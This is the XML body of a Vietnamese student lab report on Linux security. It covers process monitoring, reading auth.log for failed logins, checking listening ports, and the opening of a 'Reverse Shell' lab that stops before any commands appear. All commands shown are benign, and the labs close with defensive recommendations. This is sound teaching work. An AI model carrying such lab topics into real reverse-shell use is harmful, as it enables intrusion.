    <w:p w14:paraId="3808C860" w14:textId="77777777" w:rsidR="006128E9" w:rsidRDefault="006128E9">
      <w:r w:rsidRPr="006128E9">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>top</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> liên tục cập nhật tình trạng hệ thống, </w:t>
      </w:r>
      <w:r w:rsidRPr="006128E9">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">ps aux </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">để lọc những tiến trình đang tiêu thụ CPU nhiều nhất. </w:t>
      </w:r>
      <w:r w:rsidRPr="006128E9">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>kill</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> để ngắt tiến trình ngay lập tức</w:t>
      </w:r>
      <w:r w:rsidR="00711FBD">
        <w:br/>
        <w:t>- Output nào cần chú ý?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43FBD49B" w14:textId="77777777" w:rsidR="006128E9" w:rsidRDefault="006128E9">
      <w:r>
        <w:t>+ PID: mã định danh duy nhất của tiến trình</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F180DF5" w14:textId="77777777" w:rsidR="006128E9" w:rsidRDefault="006128E9">
      <w:r>
        <w:t>+ %CPU và %MEM: tiến trình đang ngốn bao nhiêu phần trăm sức mạnh xử lý và bộ nhớ RAM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48DC4D11" w14:textId="77777777" w:rsidR="006128E9" w:rsidRDefault="006128E9">
      <w:r>
        <w:t>+ USER: người dung nào đang thao tác tiến trình này</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46854F94" w14:textId="77777777" w:rsidR="006128E9" w:rsidRDefault="006128E9">
      <w:r>
        <w:t>+ COMMAND: Hiển thị chính xác tên lệnh hoặc đường dẫn file đang chạy, giúp nhận diện đó là chương trình gì</w:t>
      </w:r>
      <w:r w:rsidR="00711FBD">
        <w:br/>
        <w:t>- Có rủi ro bảo mật nào?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="034AC8C5" w14:textId="77777777" w:rsidR="00C6133F" w:rsidRDefault="006128E9">
      <w:r>
        <w:t>Bị cạn kiệt tài nguyên dẫn đến tấn công từ chối dịch vụ (DoS)</w:t>
      </w:r>
      <w:r w:rsidR="00711FBD">
        <w:br/>
        <w:t>- Nếu là hệ thống thật thì cần xử lý gì thêm?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6704E589" w14:textId="77777777" w:rsidR="006128E9" w:rsidRDefault="006128E9">
      <w:r>
        <w:t>+ Hạn chế lạm dụng kill -9</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E6ACE9" w14:textId="77777777" w:rsidR="006128E9" w:rsidRDefault="006128E9">
      <w:r>
        <w:t>+ Điều tra nguồn gốc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="498445F4" w14:textId="77777777" w:rsidR="006128E9" w:rsidRDefault="006128E9">
      <w:r>
        <w:t>+ Thiết lập giới hạn: CPU, RAM tối đa một tiến trình được phép sử dụng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="727C7D46" w14:textId="77777777" w:rsidR="006128E9" w:rsidRDefault="006128E9">
      <w:r>
        <w:t>+ Triển khai hệ thống giám sát và phản ứng tự động</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CDEEC41" w14:textId="77777777" w:rsidR="00C6133F" w:rsidRDefault="00711FBD">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>LAB 4 - Log Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F1A3CF8" w14:textId="77777777" w:rsidR="00C6133F" w:rsidRDefault="00711FBD">
      <w:r>
        <w:t>Mục tiêu:</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>Đọc log và tìm login fail</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12E3C6A5" w14:textId="1AC25A44" w:rsidR="00D40799" w:rsidRDefault="00D40799">
      <w:r w:rsidRPr="00D40799">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2D0DB5E0" wp14:editId="72E8CB4F">
            <wp:extent cx="5486400" cy="904240"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="106965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650314" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId17"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5486400" cy="904240"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA2019D" w14:textId="77777777" w:rsidR="00C6133F" w:rsidRDefault="00711FBD">
      <w:r>
        <w:t>Các bước thực hiện:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E249FE7" w14:textId="77777777" w:rsidR="00C6133F" w:rsidRDefault="00711FBD">
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:t>Bước 1: Theo dõi auth.log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E173FC7" w14:textId="77777777" w:rsidR="00C6133F" w:rsidRDefault="00711FBD">
      <w:r>
        <w:t>sudo tail -f /var/log/auth.log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF68D7C" w14:textId="77777777" w:rsidR="00C6133F" w:rsidRDefault="00711FBD">
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:t>Bước 2: Mở terminal mới</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="399E9FDF" w14:textId="77777777" w:rsidR="00C6133F" w:rsidRDefault="00711FBD">
      <w:r>
        <w:t>Ctrl + Shift + T</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1567EEFA" w14:textId="77777777" w:rsidR="00C6133F" w:rsidRDefault="00711FBD">
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:t>Bước 3: Thử login sai</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F47B2CD" w14:textId="77777777" w:rsidR="00C6133F" w:rsidRDefault="00711FBD">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>su root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA35557" w14:textId="77777777" w:rsidR="00C6133F" w:rsidRDefault="00711FBD">
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:t>Bước 4: Nhập sai password vài lần</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="710DAF89" w14:textId="77777777" w:rsidR="00C6133F" w:rsidRDefault="00711FBD">
      <w:r>
        <w:t>sai password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35141F2B" w14:textId="77777777" w:rsidR="00FC50CF" w:rsidRDefault="00FC50CF">
      <w:r w:rsidRPr="00FC50CF">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4A3D2F6E" wp14:editId="241C8D04">
            <wp:extent cx="5486400" cy="8013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801370"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FFC8CF6" w14:textId="77777777" w:rsidR="00C6133F" w:rsidRDefault="00711FBD">
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:t>Bước 5: Quan sát log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76B8991F" w14:textId="77777777" w:rsidR="00C6133F" w:rsidRDefault="00711FBD">
      <w:r>
        <w:t>grep 'Failed password' /var/log/auth.log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22D73FB6" w14:textId="77777777" w:rsidR="00FC50CF" w:rsidRDefault="00FC50CF">
      <w:r w:rsidRPr="00FC50CF">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="780A00F3" wp14:editId="43C535BA">
            <wp:extent cx="5486400" cy="838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838200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B3EFED" w14:textId="77777777" w:rsidR="00C6133F" w:rsidRDefault="00711FBD">
      <w:r>
        <w:t>Kết quả mong đợi:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30082387" w14:textId="77777777" w:rsidR="00C6133F" w:rsidRDefault="00711FBD">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Thấy Failed password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4347B002" w14:textId="77777777" w:rsidR="00C6133F" w:rsidRDefault="00711FBD">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Hiểu brute force cơ bản</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30381EE2" w14:textId="77777777" w:rsidR="00C6133F" w:rsidRDefault="00711FBD">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Biết đọc auth.log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74059BFD" w14:textId="77777777" w:rsidR="00C6133F" w:rsidRDefault="00711FBD">
      <w:r>
        <w:t>Phân tích sau LAB:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="163E3B97" w14:textId="77777777" w:rsidR="00FC50CF" w:rsidRDefault="00711FBD">
      <w:r>
        <w:t>- Command nào quan trọng nhất?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C80BAF0" w14:textId="77777777" w:rsidR="002E5977" w:rsidRDefault="00FC50CF">
      <w:r>
        <w:t xml:space="preserve">+ tail -f /var/log/auth.log: </w:t>
      </w:r>
      <w:r w:rsidR="002E5977">
        <w:t xml:space="preserve">lệnh quan trọng nhất cho việc </w:t>
      </w:r>
      <w:r w:rsidR="002E5977" w:rsidRPr="002E5977">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>giám sát thời gian thực</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2190740A" w14:textId="77777777" w:rsidR="002E5977" w:rsidRDefault="002E5977">
      <w:r>
        <w:t xml:space="preserve">+ grep: lệnh quan trọng nhất cho việc </w:t>
      </w:r>
      <w:r w:rsidRPr="002E5977">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>điều tra</w:t>
      </w:r>
      <w:r w:rsidR="00711FBD">
        <w:br/>
        <w:t>- Output nào cần chú ý?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC05802" w14:textId="77777777" w:rsidR="002E5977" w:rsidRDefault="002E5977">
      <w:r>
        <w:t>+ Thời gian: diễn ra khi nào? Khoảng cách giữa các lần "Failed" là bao lâu?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16FD1D4B" w14:textId="77777777" w:rsidR="002E5977" w:rsidRDefault="002E5977">
      <w:r>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidRPr="002E5977">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>Tài khoản mục tiêu:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Kẻ tấn công đang nhắm vào ai</w:t>
      </w:r>
      <w:r w:rsidR="00711FBD">
        <w:br/>
        <w:t>- Có rủi ro bảo mật nào?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0759948D" w14:textId="77777777" w:rsidR="002E5977" w:rsidRDefault="002E5977">
      <w:r>
        <w:t>Biểu hiện tấn công dò mật khẩu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12A49195" w14:textId="77777777" w:rsidR="002E5977" w:rsidRDefault="002E5977">
      <w:r>
        <w:t>+ Mối đe dọa: Kẻ tấn công sử dụng các công cụ tự động</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E71C8FC" w14:textId="77777777" w:rsidR="00C6133F" w:rsidRDefault="002E5977">
      <w:r>
        <w:t>+ Rủi ro: Mật khẩu yếu dễ bị xâm nhập</w:t>
      </w:r>
      <w:r w:rsidR="00711FBD">
        <w:br/>
        <w:t>- Nếu là hệ thống thật thì cần xử lý gì thêm?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E384CCD" w14:textId="77777777" w:rsidR="003C1AEE" w:rsidRDefault="003C1AEE">
      <w:r>
        <w:t>+ Tự động hóa phát hiện và phản hồi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E74BD5" w14:textId="77777777" w:rsidR="003C1AEE" w:rsidRDefault="003C1AEE">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">+ Chuyển đổi phương thức xác thực: Vô hiệu hóa hoàn toàn việc đăng nhập bằng mật khẩu đối với các dịch vụ mạng. Thay vào đó, bắt buộc sử dụng </w:t>
      </w:r>
      <w:r w:rsidRPr="003C1AEE">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>SSH Keys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="545511DB" w14:textId="77777777" w:rsidR="003C1AEE" w:rsidRDefault="003C1AEE">
      <w:r>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>+ Bảo vệ tài khoản đặc quyền</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E9AD27A" w14:textId="77777777" w:rsidR="00C6133F" w:rsidRDefault="00711FBD">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>LAB 5 - Networking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74897CF1" w14:textId="77777777" w:rsidR="00C6133F" w:rsidRDefault="00711FBD">
      <w:r>
        <w:t>Mục tiêu:</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>Kiểm tra IP và port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B70F4C7" w14:textId="25143592" w:rsidR="00CF14E5" w:rsidRDefault="00CF14E5">
      <w:r w:rsidRPr="00CF14E5">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1357F331" wp14:editId="68610F28">
            <wp:extent cx="5486400" cy="871220"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="45853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537939" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId20"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5486400" cy="871220"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="598B1599" w14:textId="77777777" w:rsidR="00C6133F" w:rsidRDefault="00711FBD">
      <w:r>
        <w:t>Các bước thực hiện:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C865B9" w14:textId="77777777" w:rsidR="00C6133F" w:rsidRDefault="00711FBD">
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:t>Bước 1: Kiểm tra IP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF34D8F" w14:textId="77777777" w:rsidR="00C6133F" w:rsidRDefault="00711FBD">
      <w:r>
        <w:t>ip a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29F3619C" w14:textId="1C1D4797" w:rsidR="00711FBD" w:rsidRDefault="00510F35">
      <w:r w:rsidRPr="00510F35">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2A501BE3" wp14:editId="3EF71CD1">
            <wp:extent cx="5486400" cy="2454910"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="196537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72952" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId21"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5486400" cy="2454910"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F45E7B" w14:textId="77777777" w:rsidR="00C6133F" w:rsidRDefault="00711FBD">
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:t>Bước 2: Ping internet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D99975" w14:textId="77777777" w:rsidR="00C6133F" w:rsidRDefault="00711FBD">
      <w:r>
        <w:t>ping google.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BBBF236" w14:textId="525CA46F" w:rsidR="00510F35" w:rsidRDefault="00510F35">
      <w:r w:rsidRPr="00510F35">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="471D1628" wp14:editId="51A3AC67">
            <wp:extent cx="5486400" cy="1666875"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="102209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98636" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId22"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5486400" cy="1666875"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E0F240" w14:textId="77777777" w:rsidR="00C6133F" w:rsidRDefault="00711FBD">
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:t>Bước 3: Kiểm tra port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07BA4570" w14:textId="77777777" w:rsidR="00C6133F" w:rsidRDefault="00711FBD">
      <w:r>
        <w:t xml:space="preserve">ss </w:t>
      </w:r>
      <w:r w:rsidR="003C1AEE">
        <w:t>–</w:t>
      </w:r>
      <w:r>
        <w:t>tulnp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10069868" w14:textId="1772DC23" w:rsidR="003C1AEE" w:rsidRDefault="00510F35">
      <w:r w:rsidRPr="00510F35">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2C73ECE1" wp14:editId="6EAF27CA">
            <wp:extent cx="5486400" cy="2351405"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="120126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7307" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId23"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5486400" cy="2351405"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="68118287" w14:textId="77777777" w:rsidR="00C6133F" w:rsidRDefault="00711FBD">
      <w:pPr>
        <w:pStyle w:val="ListNumber"/>
      </w:pPr>
      <w:r>
        <w:t>Bước 4: Tìm port SSH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02C97074" w14:textId="77777777" w:rsidR="00C6133F" w:rsidRDefault="00711FBD">
      <w:r>
        <w:t>ss -tulnp | grep 22</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34701300" w14:textId="43C8490D" w:rsidR="00510F35" w:rsidRDefault="00510F35">
      <w:r w:rsidRPr="00510F35">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="75A74D83" wp14:editId="63761A5E">
            <wp:extent cx="5486400" cy="567055"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="109782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28566" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId24"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5486400" cy="567055"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="04EBCBD7" w14:textId="77777777" w:rsidR="00C6133F" w:rsidRDefault="00711FBD">
      <w:r>
        <w:t>Kết quả mong đợi:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F7A556" w14:textId="77777777" w:rsidR="00C6133F" w:rsidRDefault="00711FBD">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Thấy IP máy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B8EC7DA" w14:textId="77777777" w:rsidR="00C6133F" w:rsidRDefault="00711FBD">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Hiểu listening port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F95A4CC" w14:textId="77777777" w:rsidR="00C6133F" w:rsidRDefault="00711FBD">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Biết SSH port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE02590" w14:textId="77777777" w:rsidR="00C6133F" w:rsidRDefault="00711FBD">
      <w:r>
        <w:t>Phân tích sau LAB:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="798EE0F9" w14:textId="77777777" w:rsidR="003146E6" w:rsidRDefault="00711FBD">
      <w:r>
        <w:t>- Command nào quan trọng nhất?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01DF6E13" w14:textId="77777777" w:rsidR="003146E6" w:rsidRDefault="003146E6">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Lệnh quan trọng nhất là ss -tulnp, giúp thấy những cổng mở, giao thức đang sử dụng và tiến trình đang chạy sau port đó</w:t>
      </w:r>
      <w:r w:rsidR="00711FBD">
        <w:br/>
        <w:t>- Output nào cần chú ý?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61BB053B" w14:textId="77777777" w:rsidR="003146E6" w:rsidRDefault="003146E6">
      <w:r>
        <w:t>Kết quả lệnh ss -tulnp:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46909F4B" w14:textId="77777777" w:rsidR="003146E6" w:rsidRDefault="003146E6">
      <w:r>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidRPr="003146E6">
        <w:t>Cột Local Address:Port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B8638A" w14:textId="77777777" w:rsidR="003146E6" w:rsidRDefault="003146E6">
      <w:r>
        <w:t>+ Trạng thái</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="769CD228" w14:textId="77777777" w:rsidR="003146E6" w:rsidRDefault="003146E6">
      <w:r>
        <w:t xml:space="preserve">+ Cột process: </w:t>
      </w:r>
      <w:r w:rsidRPr="003146E6">
        <w:t>xác định chính xác ứng dụng nào đang chiếm giữ port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68677374" w14:textId="77777777" w:rsidR="003146E6" w:rsidRDefault="003146E6">
      <w:r>
        <w:t>+ Netid: giao thức kết nối</w:t>
      </w:r>
      <w:r w:rsidR="00711FBD">
        <w:br/>
        <w:t>- Có rủi ro bảo mật nào?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="740DDE1A" w14:textId="76456A14" w:rsidR="00C6133F" w:rsidRDefault="003146E6">
      <w:r w:rsidRPr="003146E6">
        <w:t>Rủi ro lớn nhất nằm ở các port đang mở ra môi trường public, đặc biệt là port 22 (SSH)</w:t>
      </w:r>
      <w:r>
        <w:t>. V</w:t>
      </w:r>
      <w:r w:rsidRPr="003146E6">
        <w:t>iệc để mở bất kỳ port nào của các dịch vụ không thực sự cần thiết, hoặc các dịch vụ dùng giao thức không mã hóa, đều tạo cơ hội cho kẻ tấn công khai thác lỗ hổng hoặc nghe lén dữ liệu</w:t>
      </w:r>
      <w:r w:rsidR="00711FBD">
        <w:br/>
        <w:t>- Nếu là hệ thống thật thì cần xử lý gì thêm?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E3D905C" w14:textId="3E35E715" w:rsidR="003146E6" w:rsidRDefault="003146E6">
      <w:r>
        <w:t xml:space="preserve">+ Thu hẹp bề mặt tấn công: </w:t>
      </w:r>
      <w:r w:rsidRPr="003146E6">
        <w:t>Tắt triệt để các dịch vụ không cần thiết</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC5788F" w14:textId="28544DCD" w:rsidR="003146E6" w:rsidRDefault="003146E6">
      <w:r>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidRPr="003146E6">
        <w:t>Kiểm soát truy cập bằng Firewall</w:t>
      </w:r>
      <w:r w:rsidRPr="003146E6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="003146E6">
        <w:t xml:space="preserve"> Sử dụng iptables, ufw hoặc firewall cứng để thiết lập whitelist.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E50483A" w14:textId="48EFB2D6" w:rsidR="009670C9" w:rsidRDefault="009670C9">
      <w:r>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidRPr="009670C9">
        <w:t>Giám sát và Phản hồi chủ động</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03C1AC87" w14:textId="77777777" w:rsidR="00C6133F" w:rsidRDefault="00711FBD">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>LAB 6 - Reverse Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38046786" w14:textId="77777777" w:rsidR="00C6133F" w:rsidRDefault="00711FBD">
      <w:r>
        <w:t>Mục tiêu:</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>Hiểu outbound connection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="604DEEFF" w14:textId="1FA1DDA0" w:rsidR="00763427" w:rsidRDefault="00763427">
      <w:r w:rsidRPr="00763427">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1FBFF7BA" wp14:editId="2FD9250B">
            <wp:extent cx="5486400" cy="1242060"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="9961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4331" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId25"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5486400" cy="1242060"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C04472A" w14:textId="77777777" w:rsidR="00C6133F" w:rsidRDefault="00711FBD">
      <w:r>
        <w:t>Các bước thực hiện:</w:t>
      </w:r>
    </w:p>
